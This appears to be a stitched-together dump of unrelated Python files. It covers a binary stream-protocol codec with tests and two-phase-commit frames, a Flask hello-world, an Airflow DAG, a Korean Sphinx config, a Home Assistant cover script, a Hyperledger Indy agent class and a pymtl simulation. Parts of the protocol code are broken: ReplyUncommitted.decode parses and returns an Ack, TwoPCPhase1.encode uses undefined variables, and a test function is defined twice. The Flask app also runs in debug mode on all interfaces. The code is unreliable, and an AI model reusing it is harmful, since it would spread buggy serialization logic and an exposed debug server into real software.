event_time=None, key=None, message=None): self.test_flags_allowed(flags, message_id, event_time, key, message) self.stream_id = stream_id self.flags = flags self.message_id = message_id self.event_time = event_time if key is None or isinstance(key, bytes): self.key = key else: raise TypeError("Parameter key must be either None or bytes") if message is None or isinstance(message, bytes): self.message = message else: raise TypeError("Parameter message must be either None or bytes") def __str__(self): return ("Message(stream_id={!r}, flags={!r}, message_id={!r}, event_time" "={!r}, key={!r}, message={!r})".format( self.stream_id, self.flags, self.message_id, self.event_time, self.key, self.message)) def __eq__(self, other): return (self.stream_id == other.stream_id and self.flags == other.flags and self.message_id == other.message_id and self.event_time == other.event_time and self.key == other.key and self.message == other.message) def encode(self): self.test_flags_allowed(self.flags, self.message_id, self.event_time, self.key, self.message) sid = struct.pack('>Q', self.stream_id) flags = struct.pack('>B', self.flags) messageid = (struct.pack('>Q', self.message_id) if self.message_id else b'') event_time = (struct.pack('>q', self.event_time) if self.event_time else b'') key = (struct.pack('>H{}s'.format(len(self.key)), len(self.key), self.key) if self.key else b'') msg = self.message if self.message else b'' return b''.join((sid, flags, messageid, event_time, key, msg)) @classmethod def decode(cls, bs): reader = StringIO(bs) stream_id, flags = struct.unpack('>QB', reader.read(9)) if not (flags & cls.Ephemeral == cls.Ephemeral): message_id = struct.unpack('>Q', reader.read(8))[0] else: message_id = None if flags & cls.EventTime == cls.EventTime: event_time = struct.unpack('>q', reader.read(8))[0] else: event_time = None if flags & cls.Key == cls.Key: key_length = struct.unpack('>H', reader.read(2))[0] key = reader.read(key_length) else: key = None if not (flags & cls.Boundary == cls.Boundary): message = reader.read() else: message = None return cls(stream_id, flags, message_id, event_time, key, message) @classmethod def test_flags_allowed(cls, flags, message_id=None, event_time=None, key=None, message=None): """ Allowed flag combinations E B Eo Un Et K E x x x x B x x x Eo x x x x Un x x x Et x x K x """ if flags & cls.Ephemeral == cls.Ephemeral: assert(message_id is None) assert(not (flags & cls.Boundary == cls.Boundary)) assert(not (flags & cls.UnstableReference == cls.UnstableReference)) else: assert(message_id is not None) if flags & cls.Boundary == cls.Boundary: assert(not (flags & cls.UnstableReference == cls.UnstableReference)) assert(not (flags & cls.Key == cls.Key)) assert(key is None) if flags & cls.Boundary == cls.Boundary: assert(message is None) if flags & cls.Key == cls.Key: assert(key is not None) else: assert(key is None) if flags & cls.UnstableReference == cls.UnstableReference: assert(message_id is not None) if flags & cls.EventTime == cls.EventTime: assert(event_time is not None) else: assert(event_time is None) def test_message(): from itertools import chain, product from functools import reduce import pytest M = Message stream_id = 123 message_id = 456 event_time = 1001 key = 'key'.encode() message = 'hello world'.encode() """ Allowed flag combinations E B Eo Un Et K E x x x x B x x x Eo x x x x Un x x x Et x x K x """ flags = [M.Ephemeral, M.Boundary, M.Eos, M.UnstableReference, M.EventTime, M.Key] matrix = [ # E B Eo Un Et K [ 1, 0, 1, 0, 1, 1 ], # E [ 0, 1, 1, 0, 1, 0 ], # B [ 0, 0, 1, 1, 1, 1 ], # Eos [ 0, 0, 0, 1, 1, 1 ], # Un [ 0, 0, 0, 0, 1, 1 ], # Et [ 0, 0, 0, 0, 0, 1 ]] # K # Get all unique combinations of flags. There are 63 of them. combinations = list(itertools.chain.from_iterable(( itertools.combinations(flags, d) for d in range(1, len(flags)+1)))) flag_values = [reduce(lambda x,y: x | y, comb) for comb in combinations] for fv in flag_values: if fv & M.Ephemeral == M.Ephemeral: # raise if ephemeral & boundary if fv & M.Boundary: with pytest.raises(Exception) as e_info: M.test_flags_allowed(fv, None, event_time, key, message) # raise if ephemeral & unstable reference if fv & M.UnstableReference == M.UnstableReference: with pytest.raises(Exception) as e_info: M.test_flags_allowed(fv, None, event_time, key, message) fv = fv & ~M.Boundary & ~M.UnstableReference # raise if message_id is not none, but make sure we don't raise # because of key or eventtime f = fv | M.EventTime | M.Key with pytest.raises(Exception) as e_info: M.test_flags_allowed(f, message_id, event_time, key, message) # Don't raise otherwise # with Key and EventTime M.test_flags_allowed(f, None, event_time, key, message) # With EventTime, but no Key set f = (fv | M.EventTime) & ~M.Key with pytest.raises(Exception) as e_info: M.test_flags_allowed(f, None, event_time, key, message) M.test_flags_allowed(f, None, event_time, None, message) # With Key, but not EventTime f = (fv | M.Key) & ~M.EventTime with pytest.raises(Exception) as e_info: M.test_flags_allowed(f, None, event_time, key, message) M.test_flags_allowed(f, None, None, key, message) # No Key, no Eventtime f = fv & ~M.Key & ~M.EventTime with pytest.raises(Exception) as e_info: M.test_flags_allowed(f, None, event_time, key, message) with pytest.raises(Exception) as e_info: M.test_flags_allowed(f, None, None, key, message) with pytest.raises(Exception) as e_info: M.test_flags_allowed(f, None, event_time, None, message) M.test_flags_allowed(f, None, None, None, message) # No ephemeral... moving on! elif fv & M.Boundary == M.Boundary: # Raise if unstable reference if fv & M.UnstableReference == M.UnstableReference: f = fv | M.EventTime | M.Eos with pytest.raises(Exception) as e_info: M.test_flags_allowed(f, message_id, event_time, None, None) # raise if key if fv & M.Key == M.Key: f = fv | M.EventTime | M.Eos with pytest.raises(Exception) as e_info: M.test_flags_allowed(f, message_id, event_time, key, None) # raise if message is not None f = fv | M.EventTime | M.Eos with pytest.raises(Exception) as e_info: M.test_flags_allowed(f, message_id, event_time, None, message) elif fv & M.Eos == M.Eos: # UnstableReference, EventTime, and Key are all allowed, but not # required # Both Key and EventTime if ((fv & M.EventTime == M.EventTime) and (fv & M.Key == M.Key)): M.test_flags_allowed(fv, message_id, event_time, key, message) with pytest.raises(Exception) as e_info: M.test_flags_allowed(fv, message_id, event_time, None, message) with pytest.raises(Exception) as e_info: M.test_flags_allowed(fv, message_id, None, key, message) with pytest.raises(Exception) as e_info: M.test_flags_allowed(fv, message_id, None, None, message) # Only EventTime elif fv & M.EventTime == M.EventTime: M.test_flags_allowed(fv, message_id, event_time, None, message) with pytest.raises(Exception) as e_info: M.test_flags_allowed(fv, message_id, None, None, message) with pytest.raises(Exception) as e_info: M.test_flags_allowed(fv, message_id, None, key, message) # Only Key elif fv & M.Key == M.Key: M.test_flags_allowed(fv, message_id, None, key, message) with pytest.raises(Exception) as e_info: M.test_flags_allowed(fv, message_id, event_time, None, message) with pytest.raises(Exception) as e_info: M.test_flags_allowed(fv, message_id, None, None, message) # Neither Key nor EventTime else: M.test_flags_allowed(fv, message_id, None, None, message) # Fail if message_id is missing, because not ephemeral f = fv | M.EventTime | M.Key with pytest.raises(Exception) as e_info: M.test_flags_allowed(fv, None, event_time, key, message) elif fv & M.UnstableReference == M.UnstableReference: # message_id cannot be None # EventTime and Key are optional # message can't be None (Eos+UnstableRef case already tested above) # Both Key and EventTime if ((fv & M.EventTime == M.EventTime) and (fv & M.Key == M.Key)): M.test_flags_allowed(fv, message_id, event_time, key, message) with pytest.raises(Exception) as e_info: M.test_flags_allowed(fv, None, event_time, key, message) with pytest.raises(Exception) as e_info: M.test_flags_allowed(fv, None, event_time, None, message) with pytest.raises(Exception) as e_info: M.test_flags_allowed(fv, None, None, key, message) with pytest.raises(Exception) as e_info: M.test_flags_allowed(fv, None, None, None, message) # Only EventTime elif fv & M.EventTime == M.EventTime: M.test_flags_allowed(fv, message_id, event_time, None, message) with pytest.raises(Exception) as e_info: M.test_flags_allowed(fv, None, event_time, None, message) with pytest.raises(Exception) as e_info: M.test_flags_allowed(fv, None, None, None, message) with pytest.raises(Exception) as e_info: M.test_flags_allowed(fv, None, None, None, message) with pytest.raises(Exception) as e_info: M.test_flags_allowed(fv, None, None, key, message) # Only Key elif fv & M.Key == M.Key: M.test_flags_allowed(fv, message_id, None, key, message) with pytest.raises(Exception) as e_info: M.test_flags_allowed(fv, None, None, key, message) with pytest.raises(Exception) as e_info: M.test_flags_allowed(fv, None, event_time, None, message) with pytest.raises(Exception) as e_info: M.test_flags_allowed(fv, None, None, None, message) # Neither Key nor EventTime else: M.test_flags_allowed(fv, message_id, None, None, message) with pytest.raises(Exception) as e_info: M.test_flags_allowed(fv, None, None, None, None) # Test that for valid combinations, messages encode<->decode # successfully combs = [ # Ephemeral 1, 1 | 4, 1 | 16, 1 | 32, 1 | 4 | 16, 1 | 4 | 32, 1 | 4 | 16 | 32, # Boundary 2, 2 | 4, 2 | 16, 2 | 4 | 16, # EOS 4, 4 | 8, 4 | 16, 4 | 32, 4 | 8 | 16, 4 | 8 | 32, 4 | 8 | 16 | 32, # UnstableReference 8, 8 | 16, 8 | 32, 8 | 16 | 32, # EventTime 16, 16 | 32, # Key 32 ] for fl in combs: msg = Message( stream_id, fl, None if (fl & M.Ephemeral == M.Ephemeral) else message_id, event_time if (fl & M.EventTime == M.EventTime) else None, key if (fl & M.Key == M.Key) else None, None if (fl & M.Boundary == M.Boundary) else message) assert(msg.stream_id == stream_id) assert(msg.message_id == ( None if fl & M.Ephemeral == M.Ephemeral else message_id)) assert(msg.event_time == ( event_time if fl & M.EventTime == M.EventTime else None)) assert(msg.key == ( key if fl & M.Key == M.Key else None)) assert(msg.message == ( None if fl & M.Boundary == M.Boundary else message)) encoded = msg.encode() assert(len(encoded) == ( 8 + 1 + (8 if msg.message_id else 0) + (8 if msg.event_time else 0) + ((2 + len(key)) if msg.key else 0) + (len(message) if msg.message else 0))) decoded = Message.decode(encoded) assert(isinstance(decoded, Message)) assert(decoded.stream_id == msg.stream_id) assert(decoded.flags == msg.flags) assert(decoded.message_id == msg.message_id) assert(decoded.event_time == msg.event_time) assert(decoded.key == msg.key) assert(decoded.message == msg.message) assert(decoded == msg) assert(str(decoded) == str(msg)) # Test that all messages frame encode/decode correctly _test_frame_encode_decode(msg) class Ack(object): """ Ack(credits: U32, acks: Array[(stream_id: U64, point_of_ref: U64)] """ def __init__(self, credits, acks): self.credits = credits self.acks = acks def __str__(self): return "Ack(credits={!r}, acks={!r})".format(self.credits, self.acks) def __eq__(self, other): return (self.credits == other.credits and self.acks == other.acks) def encode(self): return (struct.pack('>II', self.credits, len(self.acks)) + b''.join(( struct.pack('>QQ', sid, por) for sid, por in self.acks))) @staticmethod def decode(bs): reader = StringIO(bs) credits = struct.unpack(">I", reader.read(4))[0] acks_length = struct.unpack(">I", reader.read(4))[0] acks = [] for _ in range(acks_length): stream_id = struct.unpack(">Q", reader.read(8))[0] point_of_ref = struct.unpack(">Q", reader.read(8))[0] acks.append((stream_id, point_of_ref)) return Ack(credits, acks) def test_ack(): c, acks = 100, [(1, 12), (2, 25), (5, 501)] ack = Ack(c, acks) assert(ack.credits == c) assert(ack.acks == acks) encoded = ack.encode() assert(len(encoded) == 4 + 4 + len(acks)*(8+8)) decoded = Ack.decode(encoded) assert(isinstance(decoded, Ack)) assert(decoded.credits == c) assert(decoded.acks == acks) assert(decoded == ack) assert(str(decoded) == str(ack)) class Restart(object): """ Restart(address: String) """ def __init__(self, address=None): self.address = address def __str__(self): return "Restart({!r})".format(self.address) def __eq__(self, other): return (other.address == self.address) def encode(self): if self.address is not None: b_addr = self.address.encode() return struct.pack('>I{}s'.format(len(b_addr)), len(b_addr), b_addr) else: return struct.pack('>I', 0) @staticmethod def decode(bs): addr = None if len(bs) > 0: reader = StringIO(bs) a_length = struct.unpack('>I', reader.read(4))[0] if a_length > 0: addr = reader.read(a_length).decode() return Restart(addr) def test_restart(): addr = '127.0.0.1:5555' r = Restart(addr) encoded = r.encode() assert(len(encoded) == len(addr.encode()) + 4) decoded = Restart.decode(encoded) assert(isinstance(decoded, Restart)) assert(decoded == r) assert(str(decoded) == str(r)) class Frame(object): _FRAME_TYPE_TUPLES = [(0, Hello), (1, Ok), (2, Error), (3, Notify), (4, NotifyAck), (5, Message), (6, Ack), (7, Restart)] _FRAME_TYPE_MAP = dict([(v, t) for v, t in _FRAME_TYPE_TUPLES] + [(t, v) for v, t in _FRAME_TYPE_TUPLES]) @classmethod def encode(cls, msg): frame_tag = cls._FRAME_TYPE_MAP[type(msg)] data = msg.encode() return struct.pack('>IB', len(data)+1, frame_tag) + data @classmethod def decode(cls, bs): # bs does not include frame length header frame_tag = struct.unpack('>B', bs[0:1])[0] return cls._FRAME_TYPE_MAP[frame_tag].decode(bs[1:]) @staticmethod def read_header(bs): return struct.unpack('>I', bs[:4])[0] def _test_frame_encode_decode(msg): framed = Frame.encode(msg) decoded = Frame.decode(framed[4:]) assert(decoded == msg) def test_frame(): assert(Frame.read_header(struct.pack('>I', 50)) == 50) msgs = [] msgs.append(Hello("version", "cookie", "program_name", "instance_name")) msgs.append(Ok(100, [(1,b"",1), (2, b"2", 2)], [("s1", "1.1.1.1:1234")])) msgs.append(Error("this is an error message")) msgs.append(Notify(123, b"stream123", 1001)) msgs.append(NotifyAck(False, 123, 1001)) # Message framing is tested in the test_message test msgs.append(Ack(1000, [(123, 999), (300, 200)])) msgs.append(Restart('127.0.0.1:5555')) for msg in msgs: _test_frame_encode_decode(msg) #### #### 2PC #### class ListUncommitted(object): """ ListUncommitted(rtag: U64) """ def __init__(self, rtag): self.rtag = rtag def __str__(self): return "ListUncommitted(rtag={!r})".format(self.rtag) def __eq__(self, other): return (self.rtag == other.rtag) def encode(self): return (struct.pack('>Q', self.rtag)) @staticmethod def decode(bs): reader = StringIO(bs) rtag = struct.unpack(">Q", reader.read(8))[0] return ListUncommitted(rtag) class ReplyUncommitted(object): """ ReplyUncommitted(rtag: U64, txn_ids: Array[(txn_id: String]) """ def __init__(self, rtag, txn_ids): self.rtag = rtag self.txn_ids = txn_ids def __str__(self): return "ReplyUncommitted(rtag={!r}, txn_ids={!r})".format(self.rtag, self.txn_ids) def __eq__(self, other): return (self.rtag == other.rtag and self.txn_ids == other.txn_ids) def encode(self): return (struct.pack('>QI', self.rtag, len(self.txn_ids)) + b''.join(( struct.pack('>H{}s'.format(len(txn_id)), len(txn_id), txn_id.encode("utf-8")) for txn_id in self.txn_ids))) @staticmethod def decode(bs): reader = StringIO(bs) credits = struct.unpack(">I", reader.read(4))[0] acks_length = struct.unpack(">I", reader.read(4))[0] acks = [] for _ in range(acks_length): stream_id = struct.unpack(">Q", reader.read(8))[0] point_of_ref = struct.unpack(">Q", reader.read(8))[0] acks.append((stream_id, point_of_ref)) return Ack(credits, acks) def encode_phase2r(txn_id, commit): if commit: commit_c = b'\01' else: commit_c = b'\00' return struct.pack(">H{}sc".format(len(txn_id)), len(txn_id), txn_id, commit_c) def decode_phase2r(bs): reader = StringIO(bs) length = struct.unpack(">H", reader.read(2))[0] txn_id = reader.read(length).decode() commit_c = reader.read(1) if commit_c == b'\01': commit = True else: commit = False return (txn_id, commit) class TwoPCPhase1(object): """ TwoPCPhase1(txn_id: String, where_list: [(stream_id: U64, start_por: U64, end_por: U64)]) """ def __init__(self, txn_id, where_list): self.txn_id = txn_id self.where_list = where_list def __str__(self): return "TwoPCPhase1(txn_id={!r},where_list={!r})".format(self.txn_id, self.where_list) def __eq__(self, other): return (self.txn_id == other.txn_id and self.where_list == other.where_list) def encode(self): return (struct.pack(">H{}sI".format(len(txn_id)), len(txn_id), txn_id, len(where_list)) + b''.join(( struct.pack('>QQQ', stream_id, start_por, end_por) for (stream_id, start_por, end_por) in self.where_list))) @staticmethod def decode(bs): reader = StringIO(bs) length = struct.unpack(">H", reader.read(2))[0] txn_id = reader.read(length).decode() where_list = [] length = struct.unpack(">I", reader.read(4))[0] for i in range(0, length): stream_id = struct.unpack(">Q", reader.read(8))[0] start_por = struct.unpack(">Q", reader.read(8))[0] end_por = struct.unpack(">Q", reader.read(8))[0] where_list.append((stream_id, start_por, end_por)) return TwoPCPhase1(txn_id, where_list) class TwoPCReply(object): """ TwoPCReply(txn_id: String, commit: Boolean) """ def __init__(self, txn_id, commit): self.txn_id = txn_id self.commit = commit def __str__(self): return "TwoPCReply(txn_id={!r},commit={!r})".format(self.txn_id, self.commit) def __eq__(self, other): return (self.txn_id == other.txn_id and self.commit == other.commit) def encode(self): return encode_phase2r(self.txn_id, self.commit) @staticmethod def decode(bs): (txn_id, commit) = decode_phase2r(bs) return TwoPCReply(txn_id, commit) class TwoPCPhase2(object): """ TwoPCPhase2(txn_id: String, commit: Boolean) """ def __init__(self, txn_id, commit): self.txn_id = txn_id self.commit = commit def __str__(self): return "TwoPCPhase2(txn_id={!r},commit={!r})".format(self.txn_id, self.commit) def __eq__(self, other): return (self.txn_id == other.txn_id and self.commit == other.commit) def encode(self): return encode_phase2r(self.txn_id, self.commit) @staticmethod def decode(bs): (txn_id, commit) = decode_phase2r(bs) return TwoPCPhase2(txn_id, commit) class TwoPCFrame(object): _FRAME_TYPE_TUPLES = [(201, ListUncommitted) , (202, ReplyUncommitted) , (203, TwoPCPhase1), (204, TwoPCReply), (205, TwoPCPhase2) ] _FRAME_TYPE_MAP = dict([(v, t) for v, t in _FRAME_TYPE_TUPLES] + [(t, v) for v, t in _FRAME_TYPE_TUPLES]) @classmethod def encode(cls, msg): frame_tag = cls._FRAME_TYPE_MAP[type(msg)] data = msg.encode() # Don't add length for this inner message type return struct.pack('>B', frame_tag) + data @classmethod def decode(cls, bs): # bs does not include frame length header frame_tag = struct.unpack('>B', bs[0:1])[0] return cls._FRAME_TYPE_MAP[frame_tag].decode(bs[1:]) @staticmethod def read_header(bs): return struct.unpack('>I', bs[:4])[0] def _test_twopcframe_encode_decode(msg): framed = TwoPCFrame.encode(msg) decoded = TwoPCFrame.decode(framed[4:]) assert(decoded == msg) def test_frame(): assert(Frame.read_header(struct.pack('>I', 50)) == 50) msgs = [] #msgs.append(ListUncommitted(77)) #msgs.append(ReplyUncommitted(...)) #msgs.append(TwoPCPhase1(...)) #msgs.append(TwoPCReply(...)) #msgs.append(TwoPCPhase2(...)) #msgs.append(TwoPCPhase1(...)) for msg in msgs: _test_frame_encode_decode(msg) #!/usr/bin/python #-*- coding: utf-8 -*- from flask import Flask app = Flask(__name__) @app.route('/') def hello(): return 'Hello World' if __name__ == "__main__": app.run(host="0.0.0.0", debug=True) <reponame>sathish9094/docker-airflow from datetime import datetime from airflow import DAG from airflow.operators.dummy_operator import DummyOperator from airflow.operators.python_operator import PythonOperator def print_greetings(): return 'Hey Sathish ! Python Operator called me!' #schedule for every 5 minutes #Minutes specified as a number from 0 to 59. #Hours specified as numbers from 0 to 23. #Days of the month, specified as numbers from 1 to 31. #Months specified as numbers from 1 to 12. #Days of the week, specified as numbers from 0 to 7, with Sunday represented as either/both 0 and 7. dag = DAG('python_operator',description='simple scheduler dag',schedule_interval='*/5 * * * *', start_date=datetime(2019,12,19),catchup=False) dummy_operator = DummyOperator(task_id='dummy_task',retries=3,dag=dag) hello_operator = PythonOperator(task_id='hello_task',python_callable=print_greetings,dag=dag) dummy_operator >> hello_operator<gh_stars>0 # Sphinx 문서 작성기를 위한 구성 파일입니다. # # 이 파일에는 가장 일반적인 옵션만 포함되어 있습니다. # 목록은 문서를 참조하십시오: # https://www.sphinx-doc.org/en/master/usage/configuration.html # --경로 설정-------------------------------------------------------------- # If extensions (or modules to document with autodoc) are in another directory, # 디렉토리가 상대적인 경우 이 디렉토리를 sys.path에 추가하세요. # 문서 루트, 여기에 표시된 것처럼 os.path.abspath를 사용하여 절대적으로 만듭니다. import os import sys sys.path.insert(0, os.path.abspath('../..')) # 프로젝트 정보 project = 'Blackpink Data' copyright = '2021, <NAME>' author = '<NAME>' # alpha/beta/rc 태그를 포함한 정식 버전 release = '1.0.0' # 일반 구성 import sphinx_rtd_theme # 여기에 모든 Sphinx 확장 모듈 이름을 문자열로 추가합니다. # Sphinx와 함께 제공되는 확장('sphinx.ext.*') # 또는 사용자 지정 확장일 수 있습니다. extensions = [ 'sphinx.ext.autodoc', "sphinx_rtd_theme" ] # 이 디렉토리와 관련하여 여기에 템플릿이 포함된 모든 경로를 추가합니다. templates_path = ['_templates'] # 소스 파일을 찾을 때 무시할 파일 및 디렉토리와 일치하는 소스 디렉토리에 상대적인 패턴 목록입니다. # 이 패턴은 html_static_path 및 html_extra_path에도 영향을 줍니다. exclude_patterns = [] # HTML 출력 옵션 # HTML 및 HTML 도움말 페이지에 사용할 테마입니다. 기본 제공 테마 목록은 설명서를 참조하세요. html_theme = "sphinx_rtd_theme" html_theme_options = { 'display_version': False, 'style_nav_header_background': '#cc5c79' } # 이 디렉토리에 상대적인 사용자 정의 정적 파일(예: 스타일 시트)을 포함하는 모든 경로를 여기에 추가하십시오. # 내장 정적 파일 다음에 복사되므로 "default.css"라는 파일이 내장 "default.css"를 덮어씁니다. html_static_path = ['_static'] html_theme_path = ["_themes", ]import json import hassapi as hass buttons = { "living_room_balcony_door": [ "hmw_lc_bl1_dr_neq1415576" ], "guest_room_balcony_door": [ "hmw_lc_bl1_dr_neq1415822" ], "office_window": [ "hmw_lc_bl1_dr_neq1415654" ], "master_bedroom_balcony_door_bottom": [ "hmw_lc_bl1_dr_neq1415586" ], "master_bedroom_fixed_glazing_top": [ "hmw_lc_bl1_dr_neq1415382" ], "master_bedroom_fixed_glazing_bottom": [ "hmw_lc_bl1_dr_neq1415661" # brick wall ], "master_bedroom_hallway_door_bottom": [ "hmw_lc_bl1_dr_neq1415586", # balcony door "hmw_lc_bl1_dr_neq1415382", # fixed glazing "hmw_lc_bl1_dr_neq1415661", # brick wall ], } actions = { "up": "cover/open_cover", "down": "cover/close_cover", "stop": "cover/stop_cover", } class CoverManager(hass.Hass): def initialize(self): self_log = self.log self.log = lambda func, msg: self_log(f'{func}: {msg}') self.listen_event(self.button_press, 'MQTT_MESSAGE', topic='input', namespace='mqtt') self.actors = {} for button in buttons: buttons[button] = {"actors": buttons[button], "state": "off"} for actor in buttons[button]["actors"]: try: self.actors[actor].append(button) except KeyError: self.actors[actor] = [button] for actor in self.actors: self.listen_state(self.reset_state, f'cover.{actor}', attribute='working') def button_press(self, event_name, data, kwargs): button = data['payload'].rsplit("_", 2) if button[0] not in buttons: return msg = f'event_name={event_name}, data={data}, kwargs={kwargs}' self.log('button_press()', msg) action = button[1] if buttons[button[0]]["state"] == "on": state = "off" action = "stop" else: state = "on" for actor in buttons[button[0]]["actors"]: self.log('button_press()', f"{actor}: {action}") self.call_service(actions[action], entity_id=f"cover.{actor}") for button in self.actors[actor]: buttons[button]["state"] = state def reset_state(self, entity, attribute, old, new, kwargs): msg = f'entity={entity}, attribute={attribute}, old={old}, new={new}, kwargs={kwargs}' self.log('reset_state()', msg) if old == "Yes" and new == "No": for button in self.actors[entity.split(".")[1]]: self.log('reset_state()', f"{button}: off") buttons[button]["state"] = "off" """ Module defining Agent class and related methods """ import asyncio import base64 import json import struct import time import traceback from typing import Optional import aiohttp import socket from indy import wallet, did, error, crypto, pairwise import indy_sdk_utils as utils from python_agent_utils.messages.message import Message from router.family_router import FamilyRouter from serializer.json_serializer import JSONSerializer as Serializer class WalletConnectionException(Exception): pass class Agent: """ Agent class storing all needed elements for agent operation. """ def __init__(self, hostname=None, port=None): self.owner = None self.wallet_handle = None self.endpoint = None self.endpoint_vk = None self.ui_token = None self.pool_handle = None self.ui_socket = None self.initialized = False self.modules = {} self.family_router = FamilyRouter() self.message_queue = asyncio.Queue() self.admin_key = None self.agent_admin_key = None self.outbound_admin_message_queue = asyncio.Queue() self.offer_endpoint = None self.hostname = hostname self.port = port self.init_endpoint() def register_module(self, module): self.modules[module.FAMILY] = module(self) self.family_router.register(module.FAMILY, self.modules[module.FAMILY]) def init_endpoint(self): if not self.hostname: self.hostname = socket.gethostbyname(socket.gethostname()) self.endpoint = self.offer_endpoint = 'http://' + self.hostname self.endpoint += (':' + str(self.port) if self.port else '') + '/indy' self.offer_endpoint += (':' + str(self.port) if self.port else '') + '/offer' async def route_message_to_module(self, message): return await self.family_router.route(message) async def handle_incoming(self): try: wire_msg_bytes = await self.message_queue.get() msg = await self.unpack_wire_msg(wire_msg_bytes) if msg: return await self.route_message_to_module(msg) except Exception as e: print("\n\n--- Message Processing failed --- \n\n") traceback.print_exc() async def start(self): """ Message processing loop task. """ while True: await self.handle_incoming() async def connect_wallet(self, agent_name, passphrase, ephemeral=False): """ Create if not already exists and open wallet. """ self.owner = agent_name wallet_suffix = "wallet" if ephemeral: wallet_suffix = "ephemeral_wallet" wallet_name = '{}-{}'.format(self.owner, wallet_suffix) wallet_config = json.dumps({"id": wallet_name}) wallet_credentials = json.dumps({"key": passphrase}) # Handle ephemeral wallets if ephemeral: try: await wallet.delete_wallet(wallet_config, wallet_credentials) print("Removing ephemeral wallet.") except error.IndyError as e: if e.error_code is error.ErrorCode.WalletNotFoundError: pass # This is ok, and expected. else: print("Unexpected Indy Error: {}".format(e)) except Exception as e: print(e) # pylint: disable=bare-except try: await wallet.create_wallet(wallet_config, wallet_credentials) except error.IndyError as e: if e.error_code is error.ErrorCode.WalletAlreadyExistsError: pass # This is ok, and expected. else: print("Unexpected Indy Error: {}".format(e)) except Exception as e: print(e) try: if self.wallet_handle: await wallet.close_wallet(self.wallet_handle) self.wallet_handle = await wallet.open_wallet( wallet_config, wallet_credentials ) (_, self.endpoint_vk) = await did.create_and_store_my_did(self.wallet_handle, "{}") self.initialized = True except Exception as e: print(e) print("Could not open wallet!") raise WalletConnectionException async def disconnect_wallet(self): """ Close the wallet and set back state to non initialised. """ if self.wallet_handle: await wallet.close_wallet(self.wallet_handle) self.initialized = False self.owner = '' self.wallet_handle = None async def sign_agent_message_field(self, field_value, my_vk): timestamp_bytes = struct.pack(">Q", int(time.time())) sig_data_bytes = timestamp_bytes + json.dumps(field_value).encode('ascii') sig_data = base64.urlsafe_b64encode(sig_data_bytes).decode('ascii') signature_bytes = await crypto.crypto_sign( self.wallet_handle, my_vk, sig_data_bytes ) signature = base64.urlsafe_b64encode( signature_bytes ).decode('ascii') return { "@type": "did:sov:BzCbsNYhMrjHiqZDTUASHg;spec/signature/1.0/ed25519Sha512_single", "signer": my_vk, "sig_data": sig_data, "signature": signature } async def unpack_and_verify_signed_agent_message_field(self, signed_field): signature_bytes = base64.urlsafe_b64decode(signed_field['signature'].encode('ascii')) sig_data_bytes = base64.urlsafe_b64decode(signed_field['sig_data'].encode('ascii')) sig_verified = await crypto.crypto_verify( signed_field['signer'], sig_data_bytes, signature_bytes ) data_bytes = base64.urlsafe_b64decode(signed_field['sig_data']) timestamp = struct.unpack(">Q", data_bytes[:8]) fieldjson = data_bytes[8:] return json.loads(fieldjson), sig_verified async def unpack_agent_message(self, wire_msg_bytes): if isinstance(wire_msg_bytes, str): wire_msg_bytes = bytes(wire_msg_bytes, 'utf-8') unpacked = json.loads( await crypto.unpack_message( self.wallet_handle, wire_msg_bytes ) ) from_key = None from_did = None if 'sender_verkey' in unpacked: from_key = unpacked['sender_verkey'] from_did = await utils.did_for_key(self.wallet_handle, unpacked['sender_verkey']) to_key = unpacked['recipient_verkey'] to_did = await utils.did_for_key(self.wallet_handle, unpacked['recipient_verkey']) msg = Serializer.deserialize(unpacked['message']) msg.context = { 'from_did': from_did, # Could be None 'to_did': to_did, # Could be None 'from_key': from_key, # Could be None 'to_key': to_key } return msg async def send_message_to_agent(self, to_did, msg: Message): print("Sending:", msg) their_did = to_did pairwise_info = json.loads(await pairwise.get_pairwise(self.wallet_handle, their_did)) pairwise_meta = json.loads(pairwise_info['metadata']) my_did = pairwise_info['my_did'] their_endpoint = pairwise_meta['their_endpoint'] their_vk = pairwise_meta['their_vk'] my_vk = await did.key_for_local_did(self.wallet_handle, my_did) await self.send_message_to_endpoint_and_key(their_vk, their_endpoint, msg, my_vk) # used directly when sending to an endpoint without a known did async def send_message_to_endpoint_and_key(self, their_ver_key, their_endpoint, msg, my_ver_key=None): # If my_ver_key is omitted, anoncrypt is used inside pack. wire_message = await crypto.pack_message( self.wallet_handle, Serializer.serialize(msg).decode('utf-8'), [their_ver_key], my_ver_key ) async with aiohttp.ClientSession() as session: headers = { 'content-type': 'application/ssi-agent-wire' } async with session.post(their_endpoint, data=wire_message, headers=headers) as resp: if resp.status != 202: print(resp.status) print(await resp.text()) async def setup_admin(self, admin_key): self.admin_key = admin_key self.agent_admin_key = await crypto.create_key(self.wallet_handle, '{}') print("Admin key: ", self.agent_admin_key) async def send_admin_message(self, msg: Message): if self.agent_admin_key and self.admin_key: msg = await crypto.pack_message( self.wallet_handle, Serializer.serialize(msg).decode('utf-8'), [self.admin_key], self.agent_admin_key ) msg = msg.decode('ascii') else: msg = msg.as_json() await self.outbound_admin_message_queue.put(msg) async def unpack_wire_msg(self, wire_msg) -> Optional: # Try to unpack message assuming it's not encrypted msg = "" try: msg = Serializer.deserialize(wire_msg) except Exception as e: print("Message encrypted, attempting to unpack...") # TODO: More graceful checking here # (This is an artifact of the provisional wire format and connection protocol) if not isinstance(msg, Message) or "@type" not in msg: # Message IS encrypted so unpack it try: msg = await self.unpack_agent_message(wire_msg) except Exception as e: print('Failed to unpack message: {}\n\nError: {}'.format(wire_msg, e)) traceback.print_exc() return None return msg from copy import copy #sbaas from .stage01_rnasequencing_genesFpkmTracking_io import stage01_rnasequencing_genesFpkmTracking_io #sbaas models from .stage01_rnasequencing_genesFpkmTracking_postgresql_models import * class stage01_rnasequencing_genesFpkmTracking_execute(stage01_rnasequencing_genesFpkmTracking_io): pass;<filename>Lab_02/gcd_fsm_sim.py # # Copyright (C) 2019 <NAME> <<EMAIL>> # # This file is part of Advance SoC Design Lab Soultion. # # SoC Design Lab Soultion can not be copied and/or distributed without the express # permission of <NAME> # # File: gcd_fsm_sim.py # This is a pymtl simulation file for gcd calculation # from pymtl3 import * from pymtl3.passes.backends.yosys import TranslationImportPass from pymtl3.passes import TracingConfigs from gcd_fsm import * model = Gcd_fsm(b8) model.elaborate() vcd_file_name = model.__class__.__name__ model.config_tracing = TracingConfigs( tracing='vcd', vcd_file_name=vcd_file_name ) model.apply(SimulationPass()) model.en = b1(0) model.a = Bits(8, 49) model.b = Bits(8, 7) model.sim_reset() model.en = b1(1) while model.ack == b1(0): model.tick() print("cState: {} ack:{} en:{}" .format(model.cState, model.ack, model.en)) model.en = b1(0) 